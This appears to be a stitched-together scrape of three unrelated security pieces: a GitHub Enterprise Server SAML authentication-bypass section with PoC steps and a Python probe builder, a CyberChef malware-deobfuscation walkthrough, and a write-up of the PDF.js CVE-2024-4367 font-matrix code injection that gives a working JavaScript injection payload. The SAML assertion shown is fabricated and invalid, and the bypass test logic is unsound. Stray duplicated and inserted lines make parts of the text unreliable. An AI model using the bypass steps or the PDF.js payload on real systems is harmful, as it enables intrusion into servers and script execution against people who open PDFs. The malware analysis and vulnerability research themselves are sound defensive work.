GitHub has acted swiftly to address the issue, releasing patches for versions 3.9.15, 3.10.12, 3.11.10, and 3.12.4 of GHES. Administrators are strongly urged to update their installations immediately to mitigate the risk of compromise.

Technical vulnerability details:

The flaw lies in the way GHES handles encrypted SAML assertions. An attacker can craft a forged SAML assertion containing valid user information; when GHES processes this forged assertion, it fails to validate its signature correctly, allowing the attacker to gain access to the GHES instance.

PoC: https://github.com/absholi7ly/Bypass-authentication-GitHub-Enterprise-Server

Steps:

  • Open your penetration testing tool.
  • Create a web connection request.
  • Select the «GET» request type.
  • Enter your GHES URL.
  • Add a fake SAML Assertion parameter to your request. You can find an example of a fake SAML Assertion parameter in the GitHub documentation.
  • Check the GHES response.
  • If the response contains an HTTP status code of 200, you have successfully bypassed authentication using the fake SAML Assertion parameter.
  • If the response contains a different HTTP status code, the bypass did not succeed.

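The GET-based check in the steps above can be sketched in Python; sending the request and inspecting the status code is then a one-liner with any HTTP client. Note that the endpoint path and parameter name below are assumptions for illustration, not taken from the advisory — consult the PoC repository for the exact request shape.

```python
import base64
import urllib.parse

def build_saml_probe(ghes_url, assertion_xml):
    """Build the probe URL described in the steps above (sketch).

    The "/saml/consume" path and "SAMLResponse" parameter name are
    assumptions; a real SAML response would also need to match the
    encoding the target's SAML binding expects.
    """
    token = base64.b64encode(assertion_xml.encode()).decode()
    query = urllib.parse.urlencode({"SAMLResponse": token})
    return f"{ghes_url.rstrip('/')}/saml/consume?{query}"
```

A 200 response to such a request would indicate the bypass condition described in the steps; anything else means the attempt failed.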
Note: I’m going to synthesize an example using a dummy URL (https://your-ghes-instance.com). Be sure to replace it with your real GHES URL. In this example, we’ll assume that your GHES URL is https://your-ghes-instance.com. We’ll use a fake SAML Assertion parameter that looks like this:

<Assertion ID="1234567890" IssueInstant="2024-05-21T06:40:00Z" Subject="CN=John Doe,OU=Users,O=Acme Corporation,C=US">
  <Audience>https://your-ghes-instance.com</Audience>
  <SubjectConfirmation Method="urn:oasis:names:tc:SAML:2.0:assertion:method:bearer">
    <SubjectConfirmationData>
      <NameID Type="urn:oasis:names:tc:SAML:2.0:nameid-type:persistent" Format="urn:oasis:names:tc:SAML:2.0:nameid-format:basic">jdoe</NameID>
    </SubjectConfirmationData>
  </SubjectConfirmation>
  <AuthnStatement AuthnInstant="2024-05-21T06:40:00Z" AuthnContextClassRef="urn:oasis:names:tc:SAML:2.0:assertion:AuthnContextClassRef:unspecified">
    <AuthnMethod>urn:oasis:names:tc:SAML:2.0:methodName:password</AuthnMethod>
  </AuthnStatement>
  <AttributeStatement>
    <Attribute Name="urn:oid:1.3.6.1.4.1.11.2.17.19.3.4.0.10">Acme Corporation</Attribute>
    <Attribute Name="urn:oid:1.3.6.1.4.1.11.2.17.19.3.4.0.4">jdoe@acme.com</Attribute>
  </AttributeStatement>
</Assertion>

Advanced CyberChef Techniques For Malware Analysis — Detailed Walkthrough and Examples

Advanced CyberChef Techniques For Malware Analysis - Detailed Walkthrough and Examples

Original by Matthew

We’re all used to the regular CyberChef operations like «From Base64», «From Decimal» and the occasional Magic decode or XOR. But what happens when we need to do something more advanced?

CyberChef contains many advanced operations that are often ignored in favour of Python scripting. Few are aware of the more complex operations of which CyberChef is capable. These include things like Flow Control, Registers and various Regular Expression capabilities.

In this post, we will break down some of the more advanced CyberChef operations and show how these can be applied to develop a configuration extractor for a multi-stage malware loader.

Examples of Advanced Operations in CyberChef

Before we dive in, let’s look at a quick summary of the operations we will demonstrate. 

  • Registers 
  • Regular Expressions and Capture Groups
  • Flow Control Via Forking and Merging
  • Merging
  • Subtraction
  • AES Decryption

After demonstrating these individually to show the concepts, we will combine them all to develop a configuration extractor for a multi-stage malware sample.

Obtaining the Sample 

The sample demonstrated can be found on Malware Bazaar with SHA256: befc7ebbea2d04c14e45bd52b1db9427afce022d7e2df331779dae3dfe85bfab

Advanced Operation 1 — Registers

Registers allow us to create variables within the CyberChef session and later reference them when needed. 

Registers are defined via a regular expression capture group and allow us to create a variable with an unknown value that fits a known pattern within the code. 

How To Use Registers in CyberChef

Below we have a Powershell script utilising AES decryption. 

Traditionally, this is easy to decode using CyberChef by manually copying out the key value and pasting it into an «AES Decrypt» Operation.

We can see the key copied into an AES Decrypt operation.

This method of manually copying out the key works effectively, however this means that the key is «hardcoded» and the recipe will not apply to similar samples using the same technique. 

If another sample utilises a different key, then this new key will need to be manually updated for the CyberChef recipe to work. 

Registers Example 1 

By utilising a «Register» operation, we can develop a regular expression to match the structure of the AES key and later access it via a register variable like $R0.

The AES key, in this case, is a 44-character base64 string, hence we can use a base64 regular expression of 44-46 characters to extract the AES Key. 

We can later access this via the $R0 variable inside of the AES Decrypt operation.

Registers Example 2

In a previous stage of the same sample, the malware utilises a basic subtract operation to create ASCII char codes from an array of large integers.

Traditionally, this would be decoded by manually copying out the 787 value and applying this to a subtract operation. 

However, again, this causes issues if another sample utilises the same technique but with a different value. 

A better method is to create another register with a regular expression that matches the 787 value. 

Here we can see an example of this, where a Register has been used to locate and store the 787 value inside of $R0. This can later be referenced in a subtract operation by referencing $R0.
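Conceptually, a Register is just a regex capture group whose matched value is stored for later operations. A Python sketch of the same idea (the one-liner below is illustrative, not the sample's actual code):

```python
import re

# Illustrative stand-in for the obfuscated script; the real sample
# embeds the subtraction value inside PowerShell code.
script = "[char[]]$a = (859,892,820); $k = 787;"

# Register $R0: capture whatever integer is assigned to the key
# variable, instead of hardcoding 787 in the recipe.
R0 = re.search(r"\$k\s*=\s*(\d+)", script).group(1)
```

Later operations then reference $R0, so a new sample with a different value needs no recipe changes.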

Regular Expressions

Regular expressions are frustrating, tedious and difficult to learn. But they are extremely powerful, and you should absolutely learn them in order to improve your CyberChef and malware analysis capability.

In the development of this configuration extractor, regular expressions are applied in 10 separate operations. 

Regular Expressions — Use Case 1 (Registers)

The first use of regular expressions is inside of the initial register operation. 

Here, we have applied a regex to extract a key value used later as part of the deobfuscation process. 

The key use of regex here is to generically capture keys related to the decoding process, avoiding the need to hardcode values and allowing the recipe to work across multiple samples.

How To Use Regular Expressions to Isolate Text

The second use of regular expressions in this recipe is to isolate the main array of integers containing the second stage of the malware. 

The second stage is stored inside a large array of decimal values separated by commas and contained in round brackets. 

By specifying this inside of a regex, we can extract and isolate the large array and effectively ignore the rest of the code. This is in contrast to manually copying out the array and starting a new recipe.


A key benefit here is the ability to isolate portions of the code without needing to copy and paste. This enables you to continue working inside of the same recipe

Regular Expressions — Use Case 3 (Appending Values)

Occasionally you will need to append values to individual lines of output. 

In these cases, a regular expression can be utilised to capture an entire line (.*) and then replace it with the same value (via the capture group referenced in $1) followed by another value (our initial register).

The key use case is the ability to easily capture and append data, which is essential for operations like the subtract operator which will be later used in this recipe.

Regular Expressions — Use Case 4 (Extracting Encryption Keys)

We can utilise regular expressions inside of register operations to extract encryption keys and store these inside of variables. 

Here, we can see the 44-character AES key stored inside of the $R1 register. 

This is effective as the key is stored in a particular format across samples. Leveraging regex allows us to capture this format (44 char base64 inside single quotes) without needing to worry about the exact value.

Using Regular Expressions To Extract Base64 Text

Regular expressions can be used to isolate base64 text containing content of interest. 

This particular sample stores the final malware stage inside of a large AES Encrypted and Base64 encoded blob. 

Since we have already extracted the AES key via registers, we can apply the regex to isolate the primary base64 blob and later perform the AES Decryption.

Regular Expressions — Use Case 6 (Extracting Initial Characters)

This sample utilises the first 16 bytes of the base64 decoded content to create an IV for the AES decryption. 

We can leverage regular expressions and registers to extract the first 16 bytes of the decoded content using .{16}

This enables us to capture the IV and later reference it via a register to perform the AES Decryption.

Using Regular Expressions To Remove Trailing Null-Bytes

Regular expressions can be used to remove trailing null bytes from the end of data. 

This is particularly useful as sometimes we only want to remove null bytes at the «end» of data. Whereas a traditional «remove null bytes» will remove null bytes everywhere in the code. 

In the sample here, there are trailing null bytes that are breaking a portion of the decryption process.

By applying a null byte search \0+$ we can use a find/replace to remove these trailing null bytes.
 we can use a find/replace to remove these trailing null bytes. 

In this case, the \0+ looks for one or more null bytes, and the $ specifies that this must be at the end of the data.

After applying this operation, the trailing null bytes are now removed from the end of the data.
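The same find/replace can be reproduced in Python, which makes the anchoring behaviour easy to see: only the run of nulls at the very end is removed, while inner nulls survive.

```python
import re

data = b"decrypted\x00payload\x00\x00\x00"  # inner and trailing nulls
# \0+$ : one or more null bytes, anchored to the end of the data
cleaned = re.sub(rb"\x00+$", b"", data)
```

This is why the regex approach beats a plain «Remove null bytes» operation here: a blanket removal would also strip the nulls embedded inside the decrypted data.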

How To Use a Fork in CyberChef

Forking allows us to separate values and act on each independently as if they were a separate recipe. 

In the use case below, we have a large array of decimal values, and we need to subtract 787 from every single one. A major issue here is that in order to subtract 787, we need to append 787 after every single decimal value in the screenshot below. This would be a nightmare to do by hand.

As the data is structured and separated by commas, we can apply a forking operation with a split delimiter of commas and a merge delimiter of newlines. 

The split delimiter is whatever separates the values in your data, but the merge delimiter is how you want your new data structured.

At this point, every line represents a separate input, and all future operations will act on each line independently.

If we now apply a find-replace operation, we can see that the operation has affected each line individually.

If we had applied the same concept without a fork, only a single 787 would have been added to the end of the entire blob of decimal data.

After applying the find/replace, we can continue to apply a subtraction operation and a «From Decimal». 

This reveals the decoded text and the next stage of the malware.

Note that the «Merge Delimiter» mentioned previously is purely a matter of formatting. 

Once you have decoded your content, as in the screenshot above, you will want to remove the merge delimiter to ensure that all the decoded content is together. 

We can see the full script after removing the merge delimiter.

How To Apply a Merge Operation in CyberChef

The merge operation is essentially an «undo» for fork operations.

After successfully decoding content using a fork, you should apply a merge to ensure that the new content can be analysed appropriately.

Without a merge, all future operations would affect only a single character and not the entire script.

How To Use AES Decryption in CyberChef

CyberChef is capable of AES decryption via the AES Decrypt operation.

To utilise AES decryption, look for the key indicators of AES inside of malware code and align all the variables with the AES operation. 

For example, align the Key, Mode, and IV. Then, plug these values into CyberChef.

Eventually, you can effectively automate this using Regular Expressions and Registers, as previously shown.

Configuration Extractor Walkthrough (22 Operations)

Utilising all of these techniques, we can develop a configuration extractor for a NetSupport Loader with 3 separate scripts that can all be decoded within the same recipe. 

This requires a total of 22 operations which will be demonstrated below.

The initial script is obfuscated using a large array of decimal integers. 

For each of these decimal values, the number 787 is subtracted and then the result is used as an ASCII charcode.

To decode this component, we must

  • Use a Register to extract the subtraction value
  • Use a Regular Expression to extract the decimal array
  • Use Forking to Separate each of the decimal values
  • Use a regular expression to append the 787 value stored in our register. 
  • Apply a Subtract operation to produce ASCII char codes
  • Apply a «From Decimal» to produce the 2nd stage
  • Use a Merge operation to enable analysis of the 2nd stage script. 
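The seven operations above map naturally onto a few lines of Python, which is a useful way to sanity-check the recipe's logic. The test string layout is illustrative, and the array length floor is lowered from the recipe's {1000,} so a small example matches:

```python
import re

def decode_stage1(script):
    # Op 1 (Register): capture the subtraction value, e.g. "- 787"
    sub = int(re.search(r"-\s*(\d+)\b", script).group(1))
    # Op 2 (Regex + capture group): isolate the decimal array inside brackets
    array = re.search(r"\(([\d,]{10,})\)", script).group(1)
    # Op 3 (Fork): split on commas, handling each value independently;
    # Ops 4-6 (append register, Subtract, From Decimal) happen per value
    chars = [chr(int(v) - sub) for v in array.split(",")]
    # Op 7 (Merge): re-join the per-value results into one script
    return "".join(chars)
```

The same register-then-transform pattern keeps the logic working across samples that change the subtraction value or the array contents.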

Operation 1 — Extracting Subtraction Value

The initial subtraction value can be extracted with a register operation and regular expression. 

This must be done prior to additional analysis and decoding to ensure that the subtraction value is stored inside of a register.

Operation 2 — Extracting the Decimal Array

The second step is to extract out the main decimal array using a regular expression and a capture group. 

The capture group ensures that we are isolating the decimal values and ignoring any script content surrounding it. 

This regex looks for decimals or commas [\d,] of length 1000 or more {1000,}, surrounded by round brackets \( and \)

The inner brackets without escapes form the capture group.

Operation 3 — Separating the Decimal Values

The third operation leverages a Fork to separate the decimal values and act on each of them independently. 

The Fork defines a split delimiter at the commas present in the original code, and specifies a Merge Delimiter of \n to improve readability.

Operation 4 — Appending the Subtraction Value

The fourth operation uses a regex find/replace to append the 787 value to the end of each line created by the forking operation. 

Note that we have used (.*) to capture the original decimal value, and have then used $1 to access it again. The $R0 is used to access the register that was created in Operation 1.

Operation 5 — Subtracting the Values

We can now perform the subtraction operation after appending the 787 value in Operation 4. 

This produces the original ASCII char codes that form the second stage script. 

Note that we have specified a space delimiter, as this is what separates our decimal values from our subtraction values in operation 4.

Operation 6 — Decoding ASCII Code In CyberChef

We can now decode the ASCII codes using a «From Decimal» operation. 

This produces the original script. However, the values are separated via a newline due to our previous Fork operation.

Operation 7 — Merging the Result

We now want to act on the new script in its entirety; we do not want to act on each character independently.

Hence, we will undo our forking operation by applying a Merge Operation and modifying the «Merge Delimiter» of our previous fork to an empty space.

Stage 2 — Powershell Script With AES Encryption (8 Operations)

After 7 operations, we have now uncovered a 2nd stage Powershell script that utilises AES Encryption to unravel an additional stage. 

The key points in this script that are needed for decrypting are highlighted below.

To Decode this stage, we must be able to

  • Use Registers to Extract the AES Key
  • Use Regex to extract the Base64 blob
  • Decode the Base64 blob
  • Use Registers to extract an Initialization Vector
  • Remove the IV from the output
  • Perform the AES Decryption, referencing our registers
  • Use Regex to Remove Trailing NullBytes
  • Perform a GZIP Decompression to unlock stage 3
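Operations 8 through 12 can be sketched in Python as follows; the final AES decrypt (Operation 13) would then use a third-party crypto library with key = $R1 and iv = $R2. The quoting and variable names in the test string are assumptions:

```python
import base64
import re

def extract_key_iv_ct(script):
    # Op 8 (Register $R1): 44-char base64 key inside single quotes
    key_b64 = re.search(r"'([A-Za-z0-9+/=]{44})'", script).group(1)
    # Op 9: the main base64 blob, 100+ characters long
    blob = re.search(r"[A-Za-z0-9+/=]{100,}", script).group(0)
    # Op 10: decode the blob
    decoded = base64.b64decode(blob)
    # Op 11 (Register $R2) and Op 12 (drop bytes): the IV is the first
    # 16 bytes; the remainder is the ciphertext to be AES-decrypted
    return base64.b64decode(key_b64), decoded[:16], decoded[16:]
```

With key, IV and ciphertext separated like this, the decrypt step is a straight drop-in for any AES implementation, mirroring how the registers feed the AES Decrypt operation in CyberChef.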

CyberChef Operation 8 — Extracting an AES Key

We must now extract the AES Key and store it using a Register operation. 

We can do this by applying a Register and creating a regex for base64 characters that are exactly 44 characters in length and surrounded by single quotes. (We could also adjust this to be a range from 42 to 46)

We now have the AES key stored inside of the $R1 register.

Operation 9 — Extracting the Base64 Blob

Now that we have the AES key, we can isolate the primary base64 blob that contains the next stage of the Malware. 

We can do this with a regular expression for Base64 text that is 100 or more characters in length. 

We’re also making sure to change the output format to «List Matches», as we only want the text that matches our regular expression.

Operation 10 — Decoding The Base64

This is a straightforward operation to decode the Base64 blob prior to the main AES Decryption.

Operation 11 — Extracting Initialization Vector

The first 16 bytes of the current data form the initialization vector for the AES decryption. 

We can extract this using another Register operation, specifying .{16} to grab the first 16 characters from the current blob of data.

We know that these bytes are the IV due to this code in the original script. 

Note how the first 16 bytes are taken after base64 decoding, and then this is set to the IV.

Operation 12 — Dropping the Initial 16 Bytes

The initial 16 bytes are ignored when the actual AES decryption process takes place. 

Hence, we need to remove them by using a drop bytes operation with a length of 16.

We know this is the case because the script begins the decryption from an offset of 16 from the data.

This can be confirmed with the official documentation for TransformFinalBlock.

Operation 13 — AES Decryption

Now that the Key and IV for the AES Decryption have been extracted and stored in registers, we can go ahead and apply an AES Decrypt operation. 

Note how we can access our key and IV via the $R1 and $R2 registers that were previously created. We do not need to hardcode a key here.


Also note that we do need to specify base64 and UTF8 as the formats for the key and IV, respectively, as these were their formats at the time we extracted them.

We can also note that CBC mode was chosen, as this is the mode specified in the script (an IV is only meaningful in a chained mode such as CBC).

Operation 14 — Removing Trailing Null Bytes

The current data after AES Decryption is compressed using GZIP. 

However, Gunzip fails to execute due to some random null bytes that are present at the end of the data after AES Decryption.

Operation 14 involves removing these trailing null bytes using a regular expression for «one or more null bytes \0+ at the end of the data $».

We will leave the «Replace» value empty as we want to remove the trailing null bytes.

Operation 15 — GZIP Decompression

We can now apply a Gunzip operation to perform the GZIP Decompression. 

This will reveal stage 3 of the malicious content, which is another Powershell script.

Note that we know Gzip was used as it is referenced in stage 2 after the AES Decryption process.

Stage 3 — Powershell Script (7 Operations)

We now have a stage 3 PowerShell script that leverages a very similar technique to stage 1. 

The obfuscated data is again stored in large decimal arrays, with the number 4274 subtracted from each value. 

Note that in this case, there are 4 total arrays of integers.

To Decode stage 3, we must perform the following actions

  • Use Registers to Extract The Subtraction Value
  • Use Regex to extract the decimal arrays
  • Use Forking to Separate the arrays
  • Use another Fork to Separate the individual decimal values
  • Use a find/replace to append the subtraction value
  • Perform the Subtraction
  • Restore the text from the resulting ASCII codes
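Because stage 3 is essentially stage 1 applied to several arrays, the Python equivalent only changes by using findall() for the outer fork. The subtraction value would come from the $R3 register in the recipe; it is passed as a parameter here for brevity, and the length floor is lowered from the recipe's {30,} so a small example matches:

```python
import re

def decode_stage3(script, sub):
    decoded_parts = []
    # Outer fork: every bracketed decimal array in the script
    for array in re.findall(r"\(([\d,]{5,})\)", script):
        # Inner fork + subtract + from-decimal, merged per array
        decoded_parts.append("".join(chr(int(v) - sub) for v in array.split(",")))
    return "".join(decoded_parts)
```

Each array decodes independently and the results concatenate, matching the double-fork structure of Operations 18 and 19.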

Operation 16 — Extracting The Subtraction Value with Registers

Our first step of stage 3 is to extract the subtraction value and store it inside a register. 

We can do this by creating another register and implementing a regular expression to capture the value $SHY=4274. We can specify a dollar sign, followed by characters, followed by an equals sign, followed by integers, followed by a semicolon.

Apply a capture group (round brackets) to the decimal component, as we want to store and use this later.

Operation 17 — Extracting and Isolating the Decimal Arrays

Now that we have the subtraction key, we can go ahead and use a regular expression to isolate the decimal arrays.

We have chosen a regex that looks for round brackets containing long sequences of integers and commas (at least 30). The inside of the brackets has been converted to a capture group by adding round brackets without escapes. 

We have also selected List Capture Groups to list only the captured decimal values and commas.

Operation 18 — Separating the Arrays With Forking

We can now separate the decimal arrays by applying a fork operation. 

The current arrays are separated by a new line, so we can specify this as our split delimiter. 

In the interests of readability, we can specify our merge delimiter as a double newline. The double newline does nothing except make the output easier to read.

Operation 19 — Separating the Decimal Values With another Fork

Now that we’ve isolated the arrays, we need to isolate the individual integer values so that we can append the subtraction value. 

We can do this with another Fork operation, specifying a comma delimiter (as this is what separates our decimal values) and a merge delimiter of newline. Again, this new line does nothing but improve readability.

Operation 20 — Appending Subtraction Values

With the decimal values isolated, we can use a previous technique to capture each line and append the subtraction key currently stored in $R3.

We can see the subtraction key appended to each line containing a decimal value.

Operation 21 — Applying the Subtraction Operation

We can now apply a subtract operation to subtract the value appended in the previous step. 

This restores the original ASCII char codes so we can decode them in the next step.

Operation 22 — Decoding the ASCII Codes

With the ASCII codes restored in their original decimal form, we can apply a from decimal operation to restore the original text. 

We can see the Net.Webclient string, albeit spaced out over newlines due to our forking operation.

Final Result — Extracting Malicious URLs

Now that the content is decoded, we can remove the readability step we added in Operation 19. 

That is, we can remove the Merge Delimiter that was added to improve the readability of steps 20 and 21.

With the Merge Delimiter removed, the output of the four decimal arrays will now be displayed.

CVE-2024-4367 – Arbitrary JavaScript execution in PDF.js

CVE-2024-4367 – Arbitrary JavaScript execution in PDF.js

research by Thomas Rinsma


TL;DR 

This post details CVE-2024-4367, a vulnerability in PDF.js found by Codean Labs. PDF.js is a JavaScript-based PDF viewer maintained by Mozilla. This bug allows an attacker to execute arbitrary JavaScript code as soon as a malicious PDF file is opened. This affects all Firefox users (<126) because PDF.js is used by Firefox to show PDF files, but also seriously impacts many web- and Electron-based applications that (indirectly) use PDF.js for preview functionality.

If you are a developer of a JavaScript/TypeScript-based application that handles PDF files in any way, we recommend checking that you are not (indirectly) using a vulnerable version of PDF.js. See the end of this post for mitigation details.

Introduction 

There are two common use-cases for PDF.js. First, it is Firefox’s built-in PDF viewer. If you use Firefox and you’ve ever downloaded or browsed to a PDF file, you’ll have seen it in action. Second, it is bundled into a Node module called pdfjs-dist, with ~2.7 million weekly downloads according to NPM. In this form, websites can use it to provide embedded PDF preview functionality. This is used by everything from Git-hosting platforms to note-taking applications. The one you’re thinking of now is likely using PDF.js.

The PDF format is famously complex. With support for various media types, complicated font rendering and even rudimentary scripting, PDF readers are a common target for vulnerability researchers. With such a large amount of parsing logic, there are bound to be some mistakes, and PDF.js is no exception. What makes it unique, however, is that it is written in JavaScript as opposed to C or C++. This means that there is no opportunity for memory corruption problems, but as we will see, it comes with its own set of risks.

Glyph rendering 

You might be surprised to hear that this bug is not related to the PDF format’s (JavaScript!) scripting functionality. Instead, it is an oversight in a specific part of the font rendering code.

Fonts in PDFs can come in several different formats, some of them more obscure than others (at least for us). For modern formats like TrueType, PDF.js defers mostly to the browser’s own font renderer. In other cases, it has to manually turn glyph (i.e., character) descriptions into curves on the page. To optimize this for performance, a path generator function is pre-compiled for every glyph. If supported, this is done by making a JavaScript Function object with a body (jsBuf) containing the instructions that make up the path:

// If we can, compile cmds into JS for MAXIMUM SPEED...
if (this.isEvalSupported && FeatureTest.isEvalSupported) {
  const jsBuf = [];
  for (const current of cmds) {
    const args = current.args !== undefined ? current.args.join(",") : "";
    jsBuf.push("c.", current.cmd, "(", args, ");\n");
  }
  console.log(jsBuf.join("")); // instrumentation: log the generated body
  // eslint-disable-next-line no-new-func
  return (this.compiledGlyphs[character] = new Function(
    "c",
    "size",
    jsBuf.join("")
  ));
}

From an attacker’s perspective this is really interesting: if we can somehow control these cmds going into the Function body and insert our own code, it would be executed as soon as such a glyph is rendered.

Well, let’s look at how this list of commands is generated. Following the logic back to the CompiledFont class, we find the method compileGlyph(...). This method initializes the cmds array with a few general commands (save, transform, scale and restore), and defers to a compileGlyphImpl(...) method to fill in the actual glyph-specific commands:

compileGlyph(code, glyphId) {
    if (!code || code.length === 0 || code[0] === 14) {
      return NOOP;
    }

    let fontMatrix = this.fontMatrix;
    ...

    const cmds = [
      { cmd: "save" },
      { cmd: "transform", args: fontMatrix.slice() },
      { cmd: "scale", args: ["size", "-size"] },
    ];
    this.compileGlyphImpl(code, cmds, glyphId);

    cmds.push({ cmd: "restore" });

    return cmds;
  }

If we instrument the PDF.js code to log generated Function objects, we see that the generated code indeed contains those commands:

c.save();
c.transform(0.001,0,0,0.001,0,0);
c.scale(size,-size);
c.moveTo(0,0);
c.restore();
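To make concrete what happens when such a glyph is rendered, here is a small standalone sketch (not PDF.js code): the compiled body is simply invoked with a canvas-like context c and a size, and each line becomes a method call on c.

```javascript
// The body below is the logged output from above; a recording stub
// stands in for the real canvas context.
const body =
  "c.save();\n" +
  "c.transform(0.001,0,0,0.001,0,0);\n" +
  "c.scale(size,-size);\n" +
  "c.moveTo(0,0);\n" +
  "c.restore();\n";
const glyphFn = new Function("c", "size", body);

const calls = [];
const stub = new Proxy({}, {
  // Every property access yields a function that records its own name.
  get: (_, name) => (...args) => calls.push(name),
});
glyphFn(stub, 12);
// calls: ["save", "transform", "scale", "moveTo", "restore"]
```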

At this point we could audit the font parsing code and the various commands and arguments that can be produced by glyphs, like quadraticCurveTo and bezierCurveTo, but all of this seems pretty innocent, with no ability to control anything other than numbers. What turns out to be much more interesting, however, is the transform command we saw above:

{ cmd: "transform", args: fontMatrix.slice() },

This fontMatrix array is copied (with .slice()) and inserted into the body of the Function object, joined by commas. The code clearly assumes that it is a numeric array, but is that always the case? Any string inside this array would be inserted literally, without any quotes surrounding it. Hence, that would break the JavaScript syntax at best, and give arbitrary code execution at worst. But can we even control the contents of fontMatrix to that degree?
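To see why a non-numeric element is dangerous, consider this standalone sketch (not PDF.js code; the payload string is our own): a string element simply breaks out of the c.transform(...) call.

```javascript
// The payload closes the transform(...) call, runs our statement, and
// leaves a dangling "void(0" so the template's trailing ");" still parses.
globalThis.injected = false;
const fontMatrix = [1, 2, 3, 4, 5, "0); globalThis.injected = true; void(0"];
const body = "c.transform(" + fontMatrix.join(",") + ");\n";
// body: c.transform(1,2,3,4,5,0); globalThis.injected = true; void(0);
new Function("c", body)({ transform: () => {} });
console.log(globalThis.injected); // true
```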

Enter the FontMatrix 

The value of fontMatrix defaults to [0.001, 0, 0, 0.001, 0, 0], but it is often set to a custom matrix by the font itself, i.e., in its own embedded metadata. How this is done exactly differs per font format. Here’s the Type1 parser, for example:

extractFontHeader(properties) {
    let token;
    while ((token = this.getToken()) !== null) {
      if (token !== "/") {
        continue;
      }
      token = this.getToken();
      switch (token) {
        case "FontMatrix":
          const matrix = this.readNumberArray();
          properties.fontMatrix = matrix;
          break;
        ...
      }
      ...
    }
    ...
  }

This is not very interesting for us. Even though Type1 fonts technically contain arbitrary PostScript code in their header, no sane PDF reader supports this fully, and most just try to read predefined key-value pairs with expected types. In this case, PDF.js just reads a number array when it encounters a FontMatrix key. It appears that the CFF parser (used for several other font formats) is similar in this regard. All in all, it looks like we are indeed limited to numbers.
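A hypothetical sketch of what such a readNumberArray()-style helper boils down to (the function name matches the snippet above, but the token shape and logic here are our own simplification): every element is forced through number parsing, so a font-internal FontMatrix can only ever contain numbers.

```javascript
// Everything between the brackets is parsed as a float; a string can
// never survive this path, it just becomes NaN at worst.
function readNumberArray(tokens) {
  const out = [];
  for (const t of tokens) {
    if (t === "[" || t === "]") continue;
    out.push(parseFloat(t));
  }
  return out;
}

const m = readNumberArray(["[", "0.001", "0", "0", "0.001", "0", "0", "]"]);
// m: [0.001, 0, 0, 0.001, 0, 0]
```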

However, it turns out that there is more than one potential origin of this matrix. Apparently, it is also possible to specify a custom FontMatrix value outside of a font, namely in a metadata object in the PDF! Looking carefully at the PartialEvaluator.translateFont(...) method, we see that it loads various attributes from PDF dictionaries associated with the font, one of them being the fontMatrix:

const properties = {
      type,
      name: fontName.name,
      subtype,
      file: fontFile,
      ...
      fontMatrix: dict.getArray("FontMatrix") || FONT_IDENTITY_MATRIX,
      ...
      bbox: descriptor.getArray("FontBBox") || dict.getArray("FontBBox"),
      ascent: descriptor.get("Ascent"),
      descent: descriptor.get("Descent"),
      xHeight: descriptor.get("XHeight") || 0,
      capHeight: descriptor.get("CapHeight") || 0,
      flags: descriptor.get("Flags"),
      italicAngle: descriptor.get("ItalicAngle") || 0,
      ...
    };

In the PDF format, font definitions consist of several objects: the Font, its FontDescriptor and the actual FontFile. For example, here they are represented by objects 1, 2 and 3:

1 0 obj
<<
  /Type /Font
  /Subtype /Type1
  /FontDescriptor 2 0 R
  /BaseFont /FooBarFont
>>
endobj

2 0 obj
<<
  /Type /FontDescriptor
  /FontName /FooBarFont
  /FontFile 3 0 R
  /ItalicAngle 0
  /Flags 4
>>
endobj

3 0 obj
<<
  /Length 100
>>
... (actual binary font data) ...
endobj

The dict referenced by the code above refers to the Font object. Hence, we should be able to define a custom FontMatrix array like this:

1 0 obj
<<
  /Type /Font
  /Subtype /Type1
  /FontDescriptor 2 0 R
  /BaseFont /FooBarFont
  /FontMatrix [1 2 3 4 5 6]   % <-----
>>
endobj

When attempting to do this, it initially looks like it doesn’t work, as the transform operations in generated Function bodies still use the default matrix. However, this happens because the font file itself is overwriting the value. Luckily, when using a Type1 font without an internal FontMatrix definition, the PDF-specified value is authoritative, as the fontMatrix value is not overwritten.
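The precedence just described can be summarized in a small sketch (simplified; effectiveFontMatrix is our own name, while the constant and the fallback expression mirror the snippets in this post):

```javascript
const FONT_IDENTITY_MATRIX = [0.001, 0, 0, 0.001, 0, 0];

// The PDF dictionary value is read first (with the identity matrix as
// default); a font-internal matrix, if present, overwrites it later.
function effectiveFontMatrix(dictMatrix, fontInternalMatrix) {
  let fontMatrix = dictMatrix || FONT_IDENTITY_MATRIX;
  if (fontInternalMatrix) {
    fontMatrix = fontInternalMatrix;
  }
  return fontMatrix;
}

// Type1 font without an internal FontMatrix: the attacker-controlled
// dictionary value wins.
const winning = effectiveFontMatrix([1, 2, 3, 4, 5, "(payload)"], null);
```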

Now that we can control this array from a PDF object we have all the flexibility we want, as PDF supports more than just number-type primitives. Let’s try inserting a string-type value instead of a number (in PDF, strings are delimited by parentheses):

/FontMatrix [1 2 3 4 5 (foobar)]

And indeed, it is plainly inserted into the Function body!

c.save();
c.transform(1,2,3,4,5,foobar);
c.scale(size,-size);
c.moveTo(0,0);
c.restore();

Exploitation and impact 

Inserting arbitrary JavaScript code is now only a matter of juggling the syntax properly. Here’s a classic example triggering an alert, by first closing the c.transform(...) call and making use of the trailing parenthesis:

/FontMatrix [1 2 3 4 5 (0\); alert\('foobar')]

The result is exactly as expected:

[Screenshot: exploitation of CVE-2024-4367, showing the alert firing when the PDF is opened]
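Tracing the payload through the compilation step from earlier makes the syntax juggling visible. A standalone sketch (the backslashes in \( and \) exist only to keep the PDF string literal balanced and disappear on unescaping):

```javascript
// After PDF string unescaping, the sixth "matrix" element is:
const payload = "0); alert('foobar'";
const fontMatrix = [1, 2, 3, 4, 5, payload];
const body = "c.transform(" + fontMatrix.join(",") + ");\n";
console.log(body);
// c.transform(1,2,3,4,5,0); alert('foobar');
// ^ transform is closed with a dummy 0, alert( is opened, and the
//   trailing ");" from the template closes the alert call.
```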

You can find a proof-of-concept PDF file here. It is made to be easy to adapt using a regular text editor. To demonstrate the context in which the JavaScript is running, the alert will show you the value of window.origin. Interestingly enough, this is not the file:// path you see in the URL bar (if you’ve downloaded the file). Instead, PDF.js runs under the origin resource://pdf.js. This prevents access to local files, but it is slightly more privileged in other aspects. For example, it is possible to invoke a file download (through a dialog), even to “download” arbitrary file:// URLs. Additionally, the real path of the opened PDF file is stored in window.PDFViewerApplication.url, allowing an attacker to spy on people opening a PDF file, learning not just when they open the file and what they’re doing with it, but also where the file is located on their machine.

